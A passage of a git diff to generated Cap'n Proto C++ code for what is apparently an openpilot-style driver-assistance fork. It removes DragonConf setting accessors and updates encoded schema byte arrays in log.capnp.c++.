::capnp::bounded<1>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpLateralMode() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralMode( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpLcMinMph() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<2>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpLcMinMph() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<2>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLcMinMph( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<2>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpLcAutoMinMph() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<3>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpLcAutoMinMph() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<3>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLcAutoMinMph( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<3>() * ::capnp::ELEMENTS, value); -} - -inline float DragonConf::Reader::getDpLcAutoDelay() const { - return _reader.getDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} - -inline float DragonConf::Builder::getDpLcAutoDelay() { - return _builder.getDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLcAutoDelay(float value) { - _builder.setDataField( - ::capnp::bounded<1>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpLateralLanelines() const { - return _reader.getDataField( - ::capnp::bounded<64>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpLateralLanelines() { - return _builder.getDataField( - ::capnp::bounded<64>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralLanelines(bool value) { - _builder.setDataField( - ::capnp::bounded<64>() * ::capnp::ELEMENTS, value); -} - -inline ::int8_t DragonConf::Reader::getDpLateralCameraOffset() const { - return _reader.getDataField< ::int8_t>( - ::capnp::bounded<9>() * ::capnp::ELEMENTS); -} - -inline ::int8_t DragonConf::Builder::getDpLateralCameraOffset() { - return _builder.getDataField< ::int8_t>( - ::capnp::bounded<9>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralCameraOffset( ::int8_t value) { - _builder.setDataField< ::int8_t>( - ::capnp::bounded<9>() * ::capnp::ELEMENTS, value); -} - -inline ::int8_t DragonConf::Reader::getDpLateralPathOffset() const { - return _reader.getDataField< ::int8_t>( - ::capnp::bounded<10>() * ::capnp::ELEMENTS); -} - -inline ::int8_t DragonConf::Builder::getDpLateralPathOffset() { - return _builder.getDataField< ::int8_t>( - ::capnp::bounded<10>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralPathOffset( ::int8_t value) { - _builder.setDataField< ::int8_t>( - ::capnp::bounded<10>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpLateralRoadEdgeDetected() const { - return _reader.getDataField( - ::capnp::bounded<65>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpLateralRoadEdgeDetected() { - return _builder.getDataField( - ::capnp::bounded<65>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralRoadEdgeDetected(bool value) { - _builder.setDataField( - ::capnp::bounded<65>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::hasDpIpAddr() const { - return !_reader.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); -} -inline bool DragonConf::Builder::hasDpIpAddr() { - return !_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS).isNull(); -} -inline ::capnp::Text::Reader DragonConf::Reader::getDpIpAddr() const { - return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_reader.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} -inline ::capnp::Text::Builder DragonConf::Builder::getDpIpAddr() { - return ::capnp::_::PointerHelpers< ::capnp::Text>::get(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} -inline void DragonConf::Builder::setDpIpAddr( ::capnp::Text::Reader value) { - ::capnp::_::PointerHelpers< ::capnp::Text>::set(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), value); -} -inline ::capnp::Text::Builder DragonConf::Builder::initDpIpAddr(unsigned int size) { - return ::capnp::_::PointerHelpers< ::capnp::Text>::init(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), size); -} -inline void DragonConf::Builder::adoptDpIpAddr( - ::capnp::Orphan< ::capnp::Text>&& value) { - ::capnp::_::PointerHelpers< ::capnp::Text>::adopt(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS), kj::mv(value)); -} -inline ::capnp::Orphan< ::capnp::Text> DragonConf::Builder::disownDpIpAddr() { - return ::capnp::_::PointerHelpers< ::capnp::Text>::disown(_builder.getPointerField( - ::capnp::bounded<1>() * ::capnp::POINTERS)); -} - -inline bool DragonConf::Reader::getDpUiTop() const { - return _reader.getDataField( - ::capnp::bounded<66>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiTop() { - return _builder.getDataField( - ::capnp::bounded<66>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiTop(bool value) { - _builder.setDataField( - ::capnp::bounded<66>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiSide() const { - return _reader.getDataField( - ::capnp::bounded<67>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiSide() { - return _builder.getDataField( - ::capnp::bounded<67>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiSide(bool value) { - _builder.setDataField( - ::capnp::bounded<67>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpUiBrightness() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<11>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpUiBrightness() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<11>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiBrightness( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<11>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpUiDisplayMode() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<12>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpUiDisplayMode() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<12>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiDisplayMode( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<12>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiSpeed() const { - return _reader.getDataField( - ::capnp::bounded<68>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiSpeed() { - return _builder.getDataField( - ::capnp::bounded<68>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiSpeed(bool value) { - _builder.setDataField( - ::capnp::bounded<68>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiEvent() const { - return _reader.getDataField( - ::capnp::bounded<69>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiEvent() { - return _builder.getDataField( - ::capnp::bounded<69>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiEvent(bool value) { - _builder.setDataField( - ::capnp::bounded<69>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiFace() const { - return _reader.getDataField( - ::capnp::bounded<70>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiFace() { - return _builder.getDataField( - ::capnp::bounded<70>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiFace(bool value) { - _builder.setDataField( - ::capnp::bounded<70>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiLeadInfo() const { - return _reader.getDataField( - ::capnp::bounded<71>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiLeadInfo() { - return _builder.getDataField( - ::capnp::bounded<71>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiLeadInfo(bool value) { - _builder.setDataField( - ::capnp::bounded<71>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiLaneline() const { - return _reader.getDataField( - ::capnp::bounded<104>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiLaneline() { - return _builder.getDataField( - ::capnp::bounded<104>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiLaneline(bool value) { - _builder.setDataField( - ::capnp::bounded<104>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiChevron() const { - return _reader.getDataField( - ::capnp::bounded<105>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiChevron() { - return _builder.getDataField( - ::capnp::bounded<105>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiChevron(bool value) { - _builder.setDataField( - ::capnp::bounded<105>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiDmCam() const { - return _reader.getDataField( - ::capnp::bounded<106>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiDmCam() { - return _builder.getDataField( - ::capnp::bounded<106>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiDmCam(bool value) { - _builder.setDataField( - ::capnp::bounded<106>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpUiRainbow() const { - return _reader.getDataField( - ::capnp::bounded<107>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpUiRainbow() { - return _builder.getDataField( - ::capnp::bounded<107>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpUiRainbow(bool value) { - _builder.setDataField( - ::capnp::bounded<107>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpToyotaSng() const { - return _reader.getDataField( - ::capnp::bounded<108>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpToyotaSng() { - return _builder.getDataField( - ::capnp::bounded<108>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpToyotaSng(bool value) { - _builder.setDataField( - ::capnp::bounded<108>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpAccelProfileCtrl() const { - return _reader.getDataField( - ::capnp::bounded<109>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpAccelProfileCtrl() { - return _builder.getDataField( - ::capnp::bounded<109>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpAccelProfileCtrl(bool value) { - _builder.setDataField( - ::capnp::bounded<109>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpAccelProfile() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<14>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpAccelProfile() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<14>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpAccelProfile( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<14>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpToyotaCruiseOverride() const { - return _reader.getDataField( - ::capnp::bounded<110>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpToyotaCruiseOverride() { - return _builder.getDataField( - ::capnp::bounded<110>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpToyotaCruiseOverride(bool value) { - _builder.setDataField( - ::capnp::bounded<110>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpToyotaCruiseOverrideSpeed() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<15>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpToyotaCruiseOverrideSpeed() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<15>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpToyotaCruiseOverrideSpeed( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<15>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpToyotaAutoLock() const { - return _reader.getDataField( - ::capnp::bounded<111>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpToyotaAutoLock() { - return _builder.getDataField( - ::capnp::bounded<111>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpToyotaAutoLock(bool value) { - _builder.setDataField( - ::capnp::bounded<111>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpToyotaAutoUnlock() const { - return _reader.getDataField( - ::capnp::bounded<128>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpToyotaAutoUnlock() { - return _builder.getDataField( - ::capnp::bounded<128>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpToyotaAutoUnlock(bool value) { - _builder.setDataField( - ::capnp::bounded<128>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpToyotaDebugBsm() const { - return _reader.getDataField( - ::capnp::bounded<129>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpToyotaDebugBsm() { - return _builder.getDataField( - ::capnp::bounded<129>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpToyotaDebugBsm(bool value) { - _builder.setDataField( - ::capnp::bounded<129>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpMapd() const { - return _reader.getDataField( - ::capnp::bounded<130>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpMapd() { - return _builder.getDataField( - ::capnp::bounded<130>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpMapd(bool value) { - _builder.setDataField( - ::capnp::bounded<130>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpLocalDb() const { - return _reader.getDataField( - ::capnp::bounded<131>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpLocalDb() { - return _builder.getDataField( - ::capnp::bounded<131>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLocalDb(bool value) { - _builder.setDataField( - ::capnp::bounded<131>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpDashcamd() const { - return _reader.getDataField( - ::capnp::bounded<132>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpDashcamd() { - return _builder.getDataField( - ::capnp::bounded<132>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpDashcamd(bool value) { - _builder.setDataField( - ::capnp::bounded<132>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpMazdaSteerAlert() const { - return _reader.getDataField( - ::capnp::bounded<133>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpMazdaSteerAlert() { - return _builder.getDataField( - ::capnp::bounded<133>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpMazdaSteerAlert(bool value) { - _builder.setDataField( - ::capnp::bounded<133>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpSpeedCheck() const { - return _reader.getDataField( - ::capnp::bounded<134>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpSpeedCheck() { - return _builder.getDataField( - ::capnp::bounded<134>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpSpeedCheck(bool value) { - _builder.setDataField( - ::capnp::bounded<134>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpFollowingProfileCtrl() const { - return _reader.getDataField( - ::capnp::bounded<135>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpFollowingProfileCtrl() { - return _builder.getDataField( - ::capnp::bounded<135>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpFollowingProfileCtrl(bool value) { - _builder.setDataField( - ::capnp::bounded<135>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpFollowingProfile() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<17>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpFollowingProfile() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<17>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpFollowingProfile( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<17>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpLateralAlt() const { - return _reader.getDataField( - ::capnp::bounded<144>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpLateralAlt() { - return _builder.getDataField( - ::capnp::bounded<144>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralAlt(bool value) { - _builder.setDataField( - ::capnp::bounded<144>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpLateralAltSpeed() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<19>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpLateralAltSpeed() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<19>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralAltSpeed( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<19>() * ::capnp::ELEMENTS, value); -} - -inline ::uint8_t DragonConf::Reader::getDpLateralAltCtrl() const { - return _reader.getDataField< ::uint8_t>( - ::capnp::bounded<20>() * ::capnp::ELEMENTS); -} - -inline ::uint8_t DragonConf::Builder::getDpLateralAltCtrl() { - return _builder.getDataField< ::uint8_t>( - ::capnp::bounded<20>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralAltCtrl( ::uint8_t value) { - _builder.setDataField< ::uint8_t>( - ::capnp::bounded<20>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpLateralAltLanelines() const { - return _reader.getDataField( - ::capnp::bounded<145>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpLateralAltLanelines() { - return _builder.getDataField( - ::capnp::bounded<145>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralAltLanelines(bool value) { - _builder.setDataField( - ::capnp::bounded<145>() * ::capnp::ELEMENTS, value); -} - -inline ::int8_t DragonConf::Reader::getDpLateralAltCameraOffset() const { - return _reader.getDataField< ::int8_t>( - ::capnp::bounded<21>() * ::capnp::ELEMENTS); -} - -inline ::int8_t DragonConf::Builder::getDpLateralAltCameraOffset() { - return _builder.getDataField< ::int8_t>( - ::capnp::bounded<21>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralAltCameraOffset( ::int8_t value) { - _builder.setDataField< ::int8_t>( - ::capnp::bounded<21>() * ::capnp::ELEMENTS, value); -} - -inline ::int8_t DragonConf::Reader::getDpLateralAltPathOffset() const { - return _reader.getDataField< ::int8_t>( - ::capnp::bounded<22>() * ::capnp::ELEMENTS); -} - -inline ::int8_t DragonConf::Builder::getDpLateralAltPathOffset() { - return _builder.getDataField< ::int8_t>( - ::capnp::bounded<22>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralAltPathOffset( ::int8_t value) { - _builder.setDataField< ::int8_t>( - ::capnp::bounded<22>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpE2EConditional() const { - return _reader.getDataField( - ::capnp::bounded<146>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpE2EConditional() { - return _builder.getDataField( - ::capnp::bounded<146>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpE2EConditional(bool value) { - _builder.setDataField( - ::capnp::bounded<146>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpE2EConditionalAdaptFp() const { - return _reader.getDataField( - ::capnp::bounded<147>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpE2EConditionalAdaptFp() { - return _builder.getDataField( - ::capnp::bounded<147>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpE2EConditionalAdaptFp(bool value) { - _builder.setDataField( - ::capnp::bounded<147>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpE2EConditionalAdaptAp() const { - return _reader.getDataField( - ::capnp::bounded<148>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpE2EConditionalAdaptAp() { - return _builder.getDataField( - ::capnp::bounded<148>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpE2EConditionalAdaptAp(bool value) { - _builder.setDataField( - ::capnp::bounded<148>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpE2EConditionalVoacc() const { - return _reader.getDataField( - ::capnp::bounded<149>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpE2EConditionalVoacc() { - return _builder.getDataField( - ::capnp::bounded<149>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpE2EConditionalVoacc(bool value) { - _builder.setDataField( - ::capnp::bounded<149>() * ::capnp::ELEMENTS, value); -} - -inline ::int8_t DragonConf::Reader::getDpLongLeadMovingAlert() const { - return _reader.getDataField< ::int8_t>( - ::capnp::bounded<23>() * ::capnp::ELEMENTS); -} - -inline ::int8_t DragonConf::Builder::getDpLongLeadMovingAlert() { - return _builder.getDataField< ::int8_t>( - ::capnp::bounded<23>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLongLeadMovingAlert( ::int8_t value) { - _builder.setDataField< ::int8_t>( - ::capnp::bounded<23>() * ::capnp::ELEMENTS, value); -} - -inline bool DragonConf::Reader::getDpLateralLcManual() const { - return _reader.getDataField( - ::capnp::bounded<150>() * ::capnp::ELEMENTS); -} - -inline bool DragonConf::Builder::getDpLateralLcManual() { - return _builder.getDataField( - ::capnp::bounded<150>() * ::capnp::ELEMENTS); -} -inline void DragonConf::Builder::setDpLateralLcManual(bool value) { - _builder.setDataField( - ::capnp::bounded<150>() * ::capnp::ELEMENTS, value); -} - -} // namespace - diff --git a/cereal/gen/cpp/log.capnp.c++ b/cereal/gen/cpp/log.capnp.c++ index c986e8281..94fcb1ddb 100644 --- a/cereal/gen/cpp/log.capnp.c++ +++ b/cereal/gen/cpp/log.capnp.c++ @@ -4602,7 +4602,7 @@ const ::capnp::_::RawSchema s_b98c64ea27898ea0 = { 0, 2, i_b98c64ea27898ea0, nullptr, nullptr, { &s_b98c64ea27898ea0, nullptr, nullptr, 0, 0, nullptr } }; #endif // !CAPNP_LITE -static const ::capnp::_::AlignedData<661> b_a7649e2575e4591e = { +static const ::capnp::_::AlignedData<643> b_a7649e2575e4591e = { { 0, 0, 0, 0, 5, 0, 6, 0, 30, 89, 228, 117, 37, 158, 100, 167, 10, 0, 0, 0, 1, 0, 9, 0, @@ -4612,7 +4612,7 @@ static const ::capnp::_::AlignedData<661> b_a7649e2575e4591e = { 21, 0, 0, 0, 170, 0, 0, 0, 29, 0, 0, 0, 87, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 105, 0, 0, 0, 87, 8, 0, 0, + 105, 0, 0, 0, 31, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 108, 111, 103, 46, 99, 97, 112, 110, @@ -4639,273 +4639,266 @@ static const ::capnp::_::AlignedData<661> b_a7649e2575e4591e = { 116, 97, 116, 117, 115, 0, 0, 0, 80, 97, 110, 100, 97, 67, 97, 110, 83, 116, 97, 116, 101, 0, 0, 0, - 152, 0, 0, 0, 3, 0, 4, 0, - 30, 0, 0, 0, 0, 0, 0, 0, + 148, 0, 0, 0, 3, 0, 4, 0, + 29, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 25, 4, 0, 0, 66, 0, 0, 0, + 253, 3, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 20, 4, 0, 0, 3, 0, 1, 0, - 32, 4, 0, 0, 2, 0, 1, 0, - 31, 0, 0, 0, 1, 0, 0, 0, + 248, 3, 0, 0, 3, 0, 1, 0, + 4, 4, 0, 0, 2, 0, 1, 0, + 30, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 29, 4, 0, 0, 66, 0, 0, 0, + 1, 4, 0, 0, 66, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 24, 4, 0, 0, 3, 0, 1, 0, - 36, 4, 0, 0, 2, 0, 1, 0, + 252, 3, 0, 0, 3, 0, 1, 0, + 8, 4, 0, 0, 2, 0, 1, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 1, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 33, 4, 0, 0, 106, 0, 0, 0, + 5, 4, 0, 0, 106, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 32, 4, 0, 0, 3, 0, 1, 0, - 44, 4, 0, 0, 2, 0, 1, 0, + 4, 4, 0, 0, 3, 0, 1, 0, + 16, 4, 0, 0, 2, 0, 1, 0, 22, 0, 0, 0, 65, 0, 0, 0, 0, 0, 1, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 41, 4, 0, 0, 130, 0, 0, 0, + 13, 4, 0, 0, 130, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 40, 4, 0, 0, 3, 0, 1, 0, - 52, 4, 0, 0, 2, 0, 1, 0, + 12, 4, 0, 0, 3, 0, 1, 0, + 24, 4, 0, 0, 2, 0, 1, 0, 1, 0, 0, 0, 66, 0, 0, 0, 0, 0, 1, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 49, 4, 0, 0, 186, 0, 0, 0, + 21, 4, 0, 0, 186, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 24, 4, 0, 0, 3, 0, 1, 0, + 36, 4, 0, 0, 2, 0, 1, 0, + 31, 0, 0, 0, 67, 0, 0, 0, + 0, 0, 1, 0, 5, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 33, 4, 0, 0, 2, 1, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 40, 4, 0, 0, 3, 0, 1, 0, + 52, 4, 0, 0, 2, 0, 1, 0, + 32, 0, 0, 0, 68, 0, 0, 0, + 0, 0, 1, 0, 6, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, + 49, 4, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 52, 4, 0, 0, 3, 0, 1, 0, 64, 4, 0, 0, 2, 0, 1, 0, - 32, 0, 0, 0, 67, 0, 0, 0, - 0, 0, 1, 0, 5, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 61, 4, 0, 0, 2, 1, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 68, 4, 0, 0, 3, 0, 1, 0, - 80, 4, 0, 0, 2, 0, 1, 0, - 33, 0, 0, 0, 68, 0, 0, 0, - 0, 0, 1, 0, 6, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 77, 4, 0, 0, 138, 0, 0, 0, - 0, 0, 0, 0, 0, 0, 0, 0, - 80, 4, 0, 0, 3, 0, 1, 0, - 92, 4, 0, 0, 2, 0, 1, 0, 2, 0, 0, 0, 3, 0, 0, 0, 0, 0, 1, 0, 7, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 89, 4, 0, 0, 138, 0, 0, 0, + 61, 4, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 92, 4, 0, 0, 3, 0, 1, 0, - 104, 4, 0, 0, 2, 0, 1, 0, + 64, 4, 0, 0, 3, 0, 1, 0, + 76, 4, 0, 0, 2, 0, 1, 0, 3, 0, 0, 0, 4, 0, 0, 0, 0, 0, 1, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 101, 4, 0, 0, 138, 0, 0, 0, + 73, 4, 0, 0, 138, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 104, 4, 0, 0, 3, 0, 1, 0, - 116, 4, 0, 0, 2, 0, 1, 0, + 76, 4, 0, 0, 3, 0, 1, 0, + 88, 4, 0, 0, 2, 0, 1, 0, 4, 0, 0, 0, 5, 0, 0, 0, 0, 0, 1, 0, 9, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 113, 4, 0, 0, 114, 0, 0, 0, + 85, 4, 0, 0, 114, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, - 112, 4, 0, 0, 3, 0, 1, 0, - 124, 4, 0, 0, 2, 0, 1, 0, + 84, 4, 